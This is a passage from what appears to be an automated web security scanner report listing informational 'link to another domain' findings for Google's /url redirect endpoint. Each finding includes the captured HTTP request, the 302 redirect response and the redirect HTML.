Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&redirect=no
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:07 GMT
Server: gws
Content-Length: 295
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&amp;redirect=no">here</A>
...[SNIP]...

18.19. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=8&ved=0CFoQFjAH&url=http%3A%2F%2Fnetvoipcommunications.com%2Fadditional-services.html&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGfl5B0e2HD7DpZKbBuz_TUyCMMlQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://netvoipcommunications.com/additional-services.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:14 GMT
Server: gws
Content-Length: 254
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://netvoipcommunications.com/additional-services.html">here</A>
...[SNIP]...

18.20. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=5&ved=0CDIQFjAE&url=https%3A%2F%2Flnp.activationnow.com%2Flnp%2F&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNHF7ZWuhtryZ0kWKCLF7bL-RcTJrg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: https://lnp.activationnow.com/lnp/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:44:45 GMT
Server: gws
Content-Length: 231
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://lnp.activationnow.com/lnp/">here</A>
...[SNIP]...

18.21. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.onwav.com%2Flnp&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGjDwcGuGT-B8V_1d8p_Ajfq3gw8Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.onwav.com/lnp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:46 GMT
Server: gws
Content-Length: 221
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.onwav.com/lnp">here</A>
...[SNIP]...

18.22. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain: